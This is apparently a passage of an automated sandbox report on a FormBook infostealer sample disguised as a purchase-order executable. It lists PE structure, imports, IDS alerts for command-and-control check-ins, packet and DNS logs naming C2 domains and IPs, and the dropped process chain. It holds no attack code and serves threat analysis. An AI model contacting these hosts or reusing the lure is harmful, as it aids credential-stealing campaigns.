IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7000	0x280	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5c4a	0x5e00	False	0.659906914893617	data	6.410763775060762	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x7000	0x115e	0x1200	False	0.4466145833333333	data	5.142548180775325	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x9000	0x1b078	0x600	False	0.455078125	data	4.2252195571372315	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x25000	0x8000	0x0	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x2d000	0x1d8a8	0x1da00	False	0.27741791930379744	data	4.920016096491695	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x2d280	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 4724 x 4724 px/m	English	United States
RT_ICON	0x3daa8	0x4b6e	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States
RT_ICON	0x42618	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 4724 x 4724 px/m	English	United States
RT_ICON	0x46840	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 4724 x 4724 px/m	English	United States
RT_ICON	0x48de8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 4724 x 4724 px/m	English	United States
RT_ICON	0x49e90	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 4724 x 4724 px/m	English	United States
RT_DIALOG	0x4a2f8	0x100	data	English	United States
RT_DIALOG	0x4a3f8	0x11c	data	English	United States
RT_DIALOG	0x4a518	0x60	data	English	United States
RT_GROUP_ICON	0x4a578	0x5a	data	English	United States
RT_MANIFEST	0x4a5d8	0x2cc	XML 1.0 document, ASCII text, with very long lines (716), with no line terminators	English	United States

Imports

DLL	Import
KERNEL32.dll	SetFileAttributesA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CompareFileTime, SearchPathA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, CreateDirectoryA, lstrcmpiA, GetTempPathA, GetCommandLineA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, LoadLibraryA, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, WaitForSingleObject, ExitProcess, GetWindowsDirectoryA, GetProcAddress, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, WriteFile, MulDiv, LoadLibraryExA, GetModuleHandleA, MultiByteToWideChar, FreeLibrary
USER32.dll	GetWindowRect, EnableMenuItem, GetSystemMenu, ScreenToClient, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetForegroundWindow, PostQuitMessage, RegisterClassA, EndDialog, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, DestroyWindow, OpenClipboard, TrackPopupMenu, SendMessageTimeoutA, GetDC, LoadImageA, GetDlgItem, FindWindowExA, IsWindow, SetClipboardData, SetWindowLongA, EmptyClipboard, SetTimer, CreateDialogParamA, wsprintfA, ShowWindow, SetWindowTextA
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
ADVAPI32.dll	RegDeleteValueA, SetFileSecurityA, RegOpenKeyExA, RegDeleteKeyA, RegEnumValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll	ImageList_Create, ImageList_Destroy, ImageList_AddMasked
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.593.179.127.2749736802031449 11/29/22-10:35:37.226497	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49736	80	192.168.2.5	93.179.127.27
192.168.2.5107.148.15.8149749802031453 11/29/22-10:36:16.701501	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49749	80	192.168.2.5	107.148.15.81
192.168.2.5107.148.15.8149749802031412 11/29/22-10:36:16.701501	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49749	80	192.168.2.5	107.148.15.81
192.168.2.593.179.127.2749736802031453 11/29/22-10:35:37.226497	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49736	80	192.168.2.5	93.179.127.27
192.168.2.5107.148.15.8149749802031449 11/29/22-10:36:16.701501	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49749	80	192.168.2.5	107.148.15.81
192.168.2.593.179.127.2749736802031412 11/29/22-10:35:37.226497	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49736	80	192.168.2.5	93.179.127.27

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 29, 2022 10:34:27.048527956 CET	49711	80	192.168.2.5	188.114.97.3
Nov 29, 2022 10:34:27.065722942 CET	80	49711	188.114.97.3	192.168.2.5
Nov 29, 2022 10:34:27.065875053 CET	49711	80	192.168.2.5	188.114.97.3
Nov 29, 2022 10:34:27.138349056 CET	49711	80	192.168.2.5	188.114.97.3
Nov 29, 2022 10:34:27.155550957 CET	80	49711	188.114.97.3	192.168.2.5
Nov 29, 2022 10:34:27.527229071 CET	80	49711	188.114.97.3	192.168.2.5
Nov 29, 2022 10:34:27.581789970 CET	49711	80	192.168.2.5	188.114.97.3
Nov 29, 2022 10:34:27.746809959 CET	80	49711	188.114.97.3	192.168.2.5
Nov 29, 2022 10:34:27.746951103 CET	49711	80	192.168.2.5	188.114.97.3
Nov 29, 2022 10:34:27.747056961 CET	49711	80	192.168.2.5	188.114.97.3
Nov 29, 2022 10:34:27.763880968 CET	80	49711	188.114.97.3	192.168.2.5
Nov 29, 2022 10:34:32.948474884 CET	49713	80	192.168.2.5	192.185.90.105
Nov 29, 2022 10:34:33.073626041 CET	80	49713	192.185.90.105	192.168.2.5
Nov 29, 2022 10:34:33.073754072 CET	49713	80	192.168.2.5	192.185.90.105
Nov 29, 2022 10:34:33.073966026 CET	49713	80	192.168.2.5	192.185.90.105
Nov 29, 2022 10:34:33.199038029 CET	80	49713	192.185.90.105	192.168.2.5
Nov 29, 2022 10:34:33.208233118 CET	80	49713	192.185.90.105	192.168.2.5
Nov 29, 2022 10:34:33.208273888 CET	80	49713	192.185.90.105	192.168.2.5
Nov 29, 2022 10:34:33.208291054 CET	80	49713	192.185.90.105	192.168.2.5
Nov 29, 2022 10:34:33.208312035 CET	80	49713	192.185.90.105	192.168.2.5
Nov 29, 2022 10:34:33.208324909 CET	80	49713	192.185.90.105	192.168.2.5
Nov 29, 2022 10:34:33.208365917 CET	49713	80	192.168.2.5	192.185.90.105
Nov 29, 2022 10:34:33.208442926 CET	49713	80	192.168.2.5	192.185.90.105
Nov 29, 2022 10:34:34.135485888 CET	49713	80	192.168.2.5	192.185.90.105
Nov 29, 2022 10:34:35.153863907 CET	49714	80	192.168.2.5	192.185.90.105
Nov 29, 2022 10:34:35.277013063 CET	80	49714	192.185.90.105	192.168.2.5
Nov 29, 2022 10:34:35.277270079 CET	49714	80	192.168.2.5	192.185.90.105
Nov 29, 2022 10:34:35.314305067 CET	49714	80	192.168.2.5	192.185.90.105
Nov 29, 2022 10:34:35.437031031 CET	80	49714	192.185.90.105	192.168.2.5
Nov 29, 2022 10:34:35.449829102 CET	80	49714	192.185.90.105	192.168.2.5
Nov 29, 2022 10:34:35.449894905 CET	80	49714	192.185.90.105	192.168.2.5
Nov 29, 2022 10:34:35.449937105 CET	80	49714	192.185.90.105	192.168.2.5
Nov 29, 2022 10:34:35.449982882 CET	80	49714	192.185.90.105	192.168.2.5
Nov 29, 2022 10:34:35.450016975 CET	80	49714	192.185.90.105	192.168.2.5
Nov 29, 2022 10:34:35.450097084 CET	49714	80	192.168.2.5	192.185.90.105
Nov 29, 2022 10:34:35.450154066 CET	49714	80	192.168.2.5	192.185.90.105
Nov 29, 2022 10:34:36.332655907 CET	49714	80	192.168.2.5	192.185.90.105
Nov 29, 2022 10:34:37.349132061 CET	49715	80	192.168.2.5	192.185.90.105
Nov 29, 2022 10:34:37.474024057 CET	80	49715	192.185.90.105	192.168.2.5
Nov 29, 2022 10:34:37.474205017 CET	49715	80	192.168.2.5	192.185.90.105
Nov 29, 2022 10:34:37.474416971 CET	49715	80	192.168.2.5	192.185.90.105
Nov 29, 2022 10:34:37.599165916 CET	80	49715	192.185.90.105	192.168.2.5
Nov 29, 2022 10:34:37.611229897 CET	80	49715	192.185.90.105	192.168.2.5
Nov 29, 2022 10:34:37.611268044 CET	80	49715	192.185.90.105	192.168.2.5
Nov 29, 2022 10:34:37.611294031 CET	80	49715	192.185.90.105	192.168.2.5
Nov 29, 2022 10:34:37.611318111 CET	80	49715	192.185.90.105	192.168.2.5
Nov 29, 2022 10:34:37.611341000 CET	80	49715	192.185.90.105	192.168.2.5
Nov 29, 2022 10:34:37.611363888 CET	80	49715	192.185.90.105	192.168.2.5
Nov 29, 2022 10:34:37.611397982 CET	80	49715	192.185.90.105	192.168.2.5
Nov 29, 2022 10:34:37.611421108 CET	80	49715	192.185.90.105	192.168.2.5
Nov 29, 2022 10:34:37.611470938 CET	49715	80	192.168.2.5	192.185.90.105
Nov 29, 2022 10:34:37.611489058 CET	80	49715	192.185.90.105	192.168.2.5
Nov 29, 2022 10:34:37.611512899 CET	80	49715	192.185.90.105	192.168.2.5
Nov 29, 2022 10:34:37.611548901 CET	80	49715	192.185.90.105	192.168.2.5
Nov 29, 2022 10:34:37.611562014 CET	49715	80	192.168.2.5	192.185.90.105
Nov 29, 2022 10:34:37.611613989 CET	49715	80	192.168.2.5	192.185.90.105
Nov 29, 2022 10:34:37.611634016 CET	49715	80	192.168.2.5	192.185.90.105
Nov 29, 2022 10:34:37.611891031 CET	49715	80	192.168.2.5	192.185.90.105
Nov 29, 2022 10:34:37.737736940 CET	80	49715	192.185.90.105	192.168.2.5
Nov 29, 2022 10:34:42.668643951 CET	49716	80	192.168.2.5	172.67.214.243
Nov 29, 2022 10:34:42.685606003 CET	80	49716	172.67.214.243	192.168.2.5
Nov 29, 2022 10:34:42.685733080 CET	49716	80	192.168.2.5	172.67.214.243
Nov 29, 2022 10:34:42.685957909 CET	49716	80	192.168.2.5	172.67.214.243
Nov 29, 2022 10:34:42.703064919 CET	80	49716	172.67.214.243	192.168.2.5
Nov 29, 2022 10:34:43.030292988 CET	80	49716	172.67.214.243	192.168.2.5
Nov 29, 2022 10:34:43.030323029 CET	80	49716	172.67.214.243	192.168.2.5
Nov 29, 2022 10:34:43.030469894 CET	49716	80	192.168.2.5	172.67.214.243
Nov 29, 2022 10:34:43.030601025 CET	80	49716	172.67.214.243	192.168.2.5
Nov 29, 2022 10:34:43.030718088 CET	49716	80	192.168.2.5	172.67.214.243
Nov 29, 2022 10:34:43.692905903 CET	49716	80	192.168.2.5	172.67.214.243
Nov 29, 2022 10:34:44.720374107 CET	49717	80	192.168.2.5	172.67.214.243
Nov 29, 2022 10:34:44.737757921 CET	80	49717	172.67.214.243	192.168.2.5
Nov 29, 2022 10:34:44.737936020 CET	49717	80	192.168.2.5	172.67.214.243
Nov 29, 2022 10:34:44.738449097 CET	49717	80	192.168.2.5	172.67.214.243
Nov 29, 2022 10:34:44.755218029 CET	80	49717	172.67.214.243	192.168.2.5
Nov 29, 2022 10:34:45.082472086 CET	80	49717	172.67.214.243	192.168.2.5
Nov 29, 2022 10:34:45.082529068 CET	80	49717	172.67.214.243	192.168.2.5
Nov 29, 2022 10:34:45.082606077 CET	80	49717	172.67.214.243	192.168.2.5
Nov 29, 2022 10:34:45.082668066 CET	49717	80	192.168.2.5	172.67.214.243
Nov 29, 2022 10:34:45.082818985 CET	49717	80	192.168.2.5	172.67.214.243
Nov 29, 2022 10:34:45.739542007 CET	49717	80	192.168.2.5	172.67.214.243
Nov 29, 2022 10:34:46.756083965 CET	49719	80	192.168.2.5	172.67.214.243
Nov 29, 2022 10:34:46.773236036 CET	80	49719	172.67.214.243	192.168.2.5
Nov 29, 2022 10:34:46.774192095 CET	49719	80	192.168.2.5	172.67.214.243
Nov 29, 2022 10:34:46.780267000 CET	49719	80	192.168.2.5	172.67.214.243
Nov 29, 2022 10:34:46.797194004 CET	80	49719	172.67.214.243	192.168.2.5
Nov 29, 2022 10:34:47.155785084 CET	80	49719	172.67.214.243	192.168.2.5
Nov 29, 2022 10:34:47.155965090 CET	80	49719	172.67.214.243	192.168.2.5
Nov 29, 2022 10:34:47.156471014 CET	49719	80	192.168.2.5	172.67.214.243
Nov 29, 2022 10:34:47.156668901 CET	49719	80	192.168.2.5	172.67.214.243
Nov 29, 2022 10:34:47.173491955 CET	80	49719	172.67.214.243	192.168.2.5
Nov 29, 2022 10:34:52.715010881 CET	49720	80	192.168.2.5	206.83.40.92
Nov 29, 2022 10:34:52.743273973 CET	80	49720	206.83.40.92	192.168.2.5
Nov 29, 2022 10:34:52.743366957 CET	49720	80	192.168.2.5	206.83.40.92
Nov 29, 2022 10:34:52.743576050 CET	49720	80	192.168.2.5	206.83.40.92
Nov 29, 2022 10:34:52.771430969 CET	80	49720	206.83.40.92	192.168.2.5
Nov 29, 2022 10:34:52.781203032 CET	80	49720	206.83.40.92	192.168.2.5
Nov 29, 2022 10:34:52.781259060 CET	80	49720	206.83.40.92	192.168.2.5
Nov 29, 2022 10:34:52.781282902 CET	80	49720	206.83.40.92	192.168.2.5
Nov 29, 2022 10:34:52.781383991 CET	49720	80	192.168.2.5	206.83.40.92

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 29, 2022 10:34:27.014851093 CET	63446	53	192.168.2.5	8.8.8.8
Nov 29, 2022 10:34:27.040199995 CET	53	63446	8.8.8.8	192.168.2.5
Nov 29, 2022 10:34:32.821219921 CET	55039	53	192.168.2.5	8.8.8.8
Nov 29, 2022 10:34:32.943109035 CET	53	55039	8.8.8.8	192.168.2.5
Nov 29, 2022 10:34:42.643572092 CET	60975	53	192.168.2.5	8.8.8.8
Nov 29, 2022 10:34:42.667421103 CET	53	60975	8.8.8.8	192.168.2.5
Nov 29, 2022 10:34:52.171785116 CET	55068	53	192.168.2.5	8.8.8.8
Nov 29, 2022 10:34:52.190450907 CET	53	55068	8.8.8.8	192.168.2.5
Nov 29, 2022 10:35:01.977390051 CET	56682	53	192.168.2.5	8.8.8.8
Nov 29, 2022 10:35:02.101298094 CET	53	56682	8.8.8.8	192.168.2.5
Nov 29, 2022 10:35:11.693732977 CET	62659	53	192.168.2.5	8.8.8.8
Nov 29, 2022 10:35:11.952652931 CET	53	62659	8.8.8.8	192.168.2.5
Nov 29, 2022 10:35:21.715904951 CET	58581	53	192.168.2.5	8.8.8.8
Nov 29, 2022 10:35:21.738689899 CET	53	58581	8.8.8.8	192.168.2.5
Nov 29, 2022 10:35:31.672270060 CET	65513	53	192.168.2.5	8.8.8.8
Nov 29, 2022 10:35:32.116449118 CET	53	65513	8.8.8.8	192.168.2.5
Nov 29, 2022 10:35:42.613173008 CET	56687	53	192.168.2.5	8.8.8.8
Nov 29, 2022 10:35:42.635181904 CET	53	56687	8.8.8.8	192.168.2.5
Nov 29, 2022 10:35:52.713239908 CET	64419	53	192.168.2.5	8.8.8.8
Nov 29, 2022 10:35:52.783279896 CET	53	64419	8.8.8.8	192.168.2.5
Nov 29, 2022 10:36:01.994003057 CET	61344	53	192.168.2.5	8.8.8.8
Nov 29, 2022 10:36:02.056188107 CET	53	61344	8.8.8.8	192.168.2.5
Nov 29, 2022 10:36:11.792120934 CET	53972	53	192.168.2.5	8.8.8.8
Nov 29, 2022 10:36:12.027338028 CET	53	53972	8.8.8.8	192.168.2.5
Nov 29, 2022 10:36:22.629139900 CET	64932	53	192.168.2.5	8.8.8.8
Nov 29, 2022 10:36:23.740036964 CET	64932	53	192.168.2.5	8.8.8.8
Nov 29, 2022 10:36:23.798295975 CET	53	64932	8.8.8.8	192.168.2.5
Nov 29, 2022 10:36:23.905383110 CET	53	64932	8.8.8.8	192.168.2.5
Nov 29, 2022 10:36:33.592092037 CET	58472	53	192.168.2.5	8.8.8.8
Nov 29, 2022 10:36:33.618837118 CET	53	58472	8.8.8.8	192.168.2.5
Nov 29, 2022 10:36:43.376907110 CET	60177	53	192.168.2.5	8.8.8.8
Nov 29, 2022 10:36:43.399647951 CET	53	60177	8.8.8.8	192.168.2.5
Nov 29, 2022 10:36:52.984909058 CET	60019	53	192.168.2.5	8.8.8.8
Nov 29, 2022 10:36:53.005125046 CET	53	60019	8.8.8.8	192.168.2.5
Nov 29, 2022 10:36:54.015237093 CET	50902	53	192.168.2.5	8.8.8.8
Nov 29, 2022 10:36:54.035623074 CET	53	50902	8.8.8.8	192.168.2.5
Nov 29, 2022 10:36:55.045731068 CET	53823	53	192.168.2.5	8.8.8.8
Nov 29, 2022 10:36:55.074374914 CET	53	53823	8.8.8.8	192.168.2.5

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Nov 29, 2022 10:36:23.905508995 CET	192.168.2.5	8.8.8.8	d009	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 29, 2022 10:34:27.014851093 CET	192.168.2.5	8.8.8.8	0x32a7	Standard query (0)	www.oonrreward.xyz	A (IP address)	IN (0x0001)	false
Nov 29, 2022 10:34:32.821219921 CET	192.168.2.5	8.8.8.8	0x1ae6	Standard query (0)	www.gmrsnodes.com	A (IP address)	IN (0x0001)	false
Nov 29, 2022 10:34:42.643572092 CET	192.168.2.5	8.8.8.8	0xa69f	Standard query (0)	www.dailyheraldresearch.com	A (IP address)	IN (0x0001)	false
Nov 29, 2022 10:34:52.171785116 CET	192.168.2.5	8.8.8.8	0x1a48	Standard query (0)	www.publickit.website	A (IP address)	IN (0x0001)	false
Nov 29, 2022 10:35:01.977390051 CET	192.168.2.5	8.8.8.8	0xa16d	Standard query (0)	www.lee-perez.com	A (IP address)	IN (0x0001)	false
Nov 29, 2022 10:35:11.693732977 CET	192.168.2.5	8.8.8.8	0x3e57	Standard query (0)	www.frwqc.com	A (IP address)	IN (0x0001)	false
Nov 29, 2022 10:35:21.715904951 CET	192.168.2.5	8.8.8.8	0x7daf	Standard query (0)	www.tommy57.shop	A (IP address)	IN (0x0001)	false
Nov 29, 2022 10:35:31.672270060 CET	192.168.2.5	8.8.8.8	0x2c4a	Standard query (0)	www.700544.com	A (IP address)	IN (0x0001)	false
Nov 29, 2022 10:35:42.613173008 CET	192.168.2.5	8.8.8.8	0x57e8	Standard query (0)	www.porggiret.site	A (IP address)	IN (0x0001)	false
Nov 29, 2022 10:35:52.713239908 CET	192.168.2.5	8.8.8.8	0x9426	Standard query (0)	www.tobewell.store	A (IP address)	IN (0x0001)	false
Nov 29, 2022 10:36:01.994003057 CET	192.168.2.5	8.8.8.8	0xbe35	Standard query (0)	www.new-thinking.digital	A (IP address)	IN (0x0001)	false
Nov 29, 2022 10:36:11.792120934 CET	192.168.2.5	8.8.8.8	0x2b64	Standard query (0)	www.ybkos.link	A (IP address)	IN (0x0001)	false
Nov 29, 2022 10:36:22.629139900 CET	192.168.2.5	8.8.8.8	0x906e	Standard query (0)	www.bookmygennie.com	A (IP address)	IN (0x0001)	false
Nov 29, 2022 10:36:23.740036964 CET	192.168.2.5	8.8.8.8	0x906e	Standard query (0)	www.bookmygennie.com	A (IP address)	IN (0x0001)	false
Nov 29, 2022 10:36:33.592092037 CET	192.168.2.5	8.8.8.8	0x92e2	Standard query (0)	www.amspustaka.com	A (IP address)	IN (0x0001)	false
Nov 29, 2022 10:36:43.376907110 CET	192.168.2.5	8.8.8.8	0x5112	Standard query (0)	www.spirituallyzen.com	A (IP address)	IN (0x0001)	false
Nov 29, 2022 10:36:52.984909058 CET	192.168.2.5	8.8.8.8	0x10fd	Standard query (0)	www.davidemarone.com	A (IP address)	IN (0x0001)	false
Nov 29, 2022 10:36:54.015237093 CET	192.168.2.5	8.8.8.8	0xdf56	Standard query (0)	www.davidemarone.com	A (IP address)	IN (0x0001)	false
Nov 29, 2022 10:36:55.045731068 CET	192.168.2.5	8.8.8.8	0xa18f	Standard query (0)	www.davidemarone.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 29, 2022 10:34:27.040199995 CET	8.8.8.8	192.168.2.5	0x32a7	No error (0)	www.oonrreward.xyz		188.114.97.3	A (IP address)	IN (0x0001)	false
Nov 29, 2022 10:34:27.040199995 CET	8.8.8.8	192.168.2.5	0x32a7	No error (0)	www.oonrreward.xyz		188.114.96.3	A (IP address)	IN (0x0001)	false
Nov 29, 2022 10:34:32.943109035 CET	8.8.8.8	192.168.2.5	0x1ae6	No error (0)	www.gmrsnodes.com	gmrsnodes.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 29, 2022 10:34:32.943109035 CET	8.8.8.8	192.168.2.5	0x1ae6	No error (0)	gmrsnodes.com		192.185.90.105	A (IP address)	IN (0x0001)	false
Nov 29, 2022 10:34:42.667421103 CET	8.8.8.8	192.168.2.5	0xa69f	No error (0)	www.dailyheraldresearch.com		172.67.214.243	A (IP address)	IN (0x0001)	false
Nov 29, 2022 10:34:42.667421103 CET	8.8.8.8	192.168.2.5	0xa69f	No error (0)	www.dailyheraldresearch.com		104.21.83.59	A (IP address)	IN (0x0001)	false
Nov 29, 2022 10:34:52.190450907 CET	8.8.8.8	192.168.2.5	0x1a48	No error (0)	www.publickit.website	publickit.website		CNAME (Canonical name)	IN (0x0001)	false
Nov 29, 2022 10:34:52.190450907 CET	8.8.8.8	192.168.2.5	0x1a48	No error (0)	publickit.website		206.83.40.92	A (IP address)	IN (0x0001)	false
Nov 29, 2022 10:35:02.101298094 CET	8.8.8.8	192.168.2.5	0xa16d	No error (0)	www.lee-perez.com		216.40.34.41	A (IP address)	IN (0x0001)	false
Nov 29, 2022 10:35:11.952652931 CET	8.8.8.8	192.168.2.5	0x3e57	No error (0)	www.frwqc.com		38.40.166.195	A (IP address)	IN (0x0001)	false
Nov 29, 2022 10:35:21.738689899 CET	8.8.8.8	192.168.2.5	0x7daf	No error (0)	www.tommy57.shop		74.208.236.65	A (IP address)	IN (0x0001)	false
Nov 29, 2022 10:35:32.116449118 CET	8.8.8.8	192.168.2.5	0x2c4a	No error (0)	www.700544.com	pp.3105.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 29, 2022 10:35:32.116449118 CET	8.8.8.8	192.168.2.5	0x2c4a	No error (0)	pp.3105.net		93.179.127.27	A (IP address)	IN (0x0001)	false
Nov 29, 2022 10:35:32.116449118 CET	8.8.8.8	192.168.2.5	0x2c4a	No error (0)	pp.3105.net		93.179.126.57	A (IP address)	IN (0x0001)	false
Nov 29, 2022 10:35:32.116449118 CET	8.8.8.8	192.168.2.5	0x2c4a	No error (0)	pp.3105.net		93.179.126.25	A (IP address)	IN (0x0001)	false
Nov 29, 2022 10:35:42.635181904 CET	8.8.8.8	192.168.2.5	0x57e8	No error (0)	www.porggiret.site		198.54.121.81	A (IP address)	IN (0x0001)	false
Nov 29, 2022 10:35:52.783279896 CET	8.8.8.8	192.168.2.5	0x9426	No error (0)	www.tobewell.store	tobewell.store		CNAME (Canonical name)	IN (0x0001)	false
Nov 29, 2022 10:35:52.783279896 CET	8.8.8.8	192.168.2.5	0x9426	No error (0)	tobewell.store		178.208.83.20	A (IP address)	IN (0x0001)	false
Nov 29, 2022 10:36:02.056188107 CET	8.8.8.8	192.168.2.5	0xbe35	No error (0)	www.new-thinking.digital		62.233.121.61	A (IP address)	IN (0x0001)	false
Nov 29, 2022 10:36:12.027338028 CET	8.8.8.8	192.168.2.5	0x2b64	No error (0)	www.ybkos.link		107.148.15.81	A (IP address)	IN (0x0001)	false
Nov 29, 2022 10:36:23.798295975 CET	8.8.8.8	192.168.2.5	0x906e	No error (0)	www.bookmygennie.com		38.163.214.169	A (IP address)	IN (0x0001)	false
Nov 29, 2022 10:36:23.905383110 CET	8.8.8.8	192.168.2.5	0x906e	No error (0)	www.bookmygennie.com		38.163.214.169	A (IP address)	IN (0x0001)	false
Nov 29, 2022 10:36:33.618837118 CET	8.8.8.8	192.168.2.5	0x92e2	No error (0)	www.amspustaka.com	amspustaka.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 29, 2022 10:36:33.618837118 CET	8.8.8.8	192.168.2.5	0x92e2	No error (0)	amspustaka.com		23.111.12.177	A (IP address)	IN (0x0001)	false
Nov 29, 2022 10:36:43.399647951 CET	8.8.8.8	192.168.2.5	0x5112	No error (0)	www.spirituallyzen.com		74.208.236.214	A (IP address)	IN (0x0001)	false
Nov 29, 2022 10:36:53.005125046 CET	8.8.8.8	192.168.2.5	0x10fd	Name error (3)	www.davidemarone.com	none	none	A (IP address)	IN (0x0001)	false
Nov 29, 2022 10:36:54.035623074 CET	8.8.8.8	192.168.2.5	0xdf56	Name error (3)	www.davidemarone.com	none	none	A (IP address)	IN (0x0001)	false
Nov 29, 2022 10:36:55.074374914 CET	8.8.8.8	192.168.2.5	0xa18f	Name error (3)	www.davidemarone.com	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.oonrreward.xyz

www.gmrsnodes.com

www.dailyheraldresearch.com

www.publickit.website

www.lee-perez.com

www.frwqc.com

www.tommy57.shop

www.700544.com

www.porggiret.site

www.tobewell.store

www.new-thinking.digital

www.ybkos.link

www.bookmygennie.com

www.amspustaka.com

www.spirituallyzen.com

Target ID:	0
Start time:	10:33:03
Start date:	29/11/2022
Path:	C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exe
Imagebase:	0x400000
File size:	405670 bytes
MD5 hash:	244FC9610F75225AA3DC09958195BEB1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Analysis Process: jaxdij.exePID: 1572, Parent PID: 748

General

Target ID:	1
Start time:	10:33:03
Start date:	29/11/2022
Path:	C:\Users\user\AppData\Local\Temp\jaxdij.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\jaxdij.exe" C:\Users\user\AppData\Local\Temp\uqnwrddys.k
Imagebase:	0x240000
File size:	147968 bytes
MD5 hash:	2DD6C8B13AE7D028B0047435FF0DCB8A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 12%, ReversingLabs
Reputation:	low

Analysis Process: jaxdij.exePID: 5360, Parent PID: 1572

General

Target ID:	2
Start time:	10:33:04
Start date:	29/11/2022
Path:	C:\Users\user\AppData\Local\Temp\jaxdij.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\jaxdij.exe" C:\Users\user\AppData\Local\Temp\uqnwrddys.k
Imagebase:	0x240000
File size:	147968 bytes
MD5 hash:	2DD6C8B13AE7D028B0047435FF0DCB8A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
